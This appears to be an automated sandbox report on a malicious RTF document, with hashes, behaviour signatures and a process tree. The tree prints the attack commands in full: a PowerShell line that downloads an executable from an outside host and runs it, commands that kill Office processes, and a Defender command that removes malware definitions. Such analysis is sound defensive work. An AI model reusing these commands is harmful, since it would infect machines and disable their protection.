Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28-09-2024 07:31

General

  • Target

    fbcc5c125e18019a5e6e536a47d5a1a8_JaffaCakes118.rtf

  • Size

    750KB

  • MD5

    fbcc5c125e18019a5e6e536a47d5a1a8

  • SHA1

    8c3b235607fe39ee44accbec28887547adf33550

  • SHA256

    7d99a30ca8f89ca4ad64055e2ec39e67fb07639e03ebc773b6375b742a7f1162

  • SHA512

    23d2e97b1b11588818244a10e9084beb5df2c4eb99f1eab145d5118dc7eb817501557144bb1dfba0133eab6a5f4af73546dfc33aa50a4b53e600094fbd36a535

  • SSDEEP

    12288:OuqyHuqyNuqy/uqySuqyKuqypuqyWuqymuqy/uqyzS:zqyOqyAqy2qyPqy3qykqyLqybqy2qyW

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://panelonetwothree.ga/work/15.exe

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fbcc5c125e18019a5e6e536a47d5a1a8_JaffaCakes118.rtf"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2460
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2488
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2764
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://panelonetwothree.ga/work/15.exe','C:\Users\Public\svchost32.exe');Start-Process 'C:\Users\Public\svchost32.exe'
        2⤵
        • Process spawned unexpected child process
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2844
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & exit
        2⤵
        • Process spawned unexpected child process
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im winword.exe
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2684
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden taskkill /f /im Excel.exe
        2⤵
        • Process spawned unexpected child process
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2848
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\system32\taskkill.exe" /f /im Excel.exe
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2760
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files (x86)\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit
        2⤵
        • Process spawned unexpected child process
        • System Location Discovery: System Language Discovery
        PID:2252

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      0e249707197afe605e7cadea43ce28fa

      SHA1

      63da5444753caf8915350d01237dce06a7c8636d

      SHA256

      2fac1d50149888aff68d801687373947f9723174550f6624a328cbc747c08c96

      SHA512

      c3f98d67cbf8f024dc17471af09c07d6534ab9e6723183a987901958d9c2c5c7d19d6b6756b327ffcf58781c273069c9b16bf33735182d6c2365f47041ad7053

    • memory/2460-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2460-2-0x000000007125D000-0x0000000071268000-memory.dmp

      Filesize

      44KB

    • memory/2460-24-0x000000007125D000-0x0000000071268000-memory.dmp

      Filesize

      44KB

    • memory/2460-0-0x000000002F231000-0x000000002F232000-memory.dmp

      Filesize

      4KB

    • memory/2764-9-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2764-12-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2764-13-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2764-11-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2764-10-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2764-15-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2764-16-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2764-8-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2764-7-0x000000007125D000-0x0000000071268000-memory.dmp

      Filesize

      44KB

    • memory/2764-25-0x000000007125D000-0x0000000071268000-memory.dmp

      Filesize

      44KB

    • memory/2764-26-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB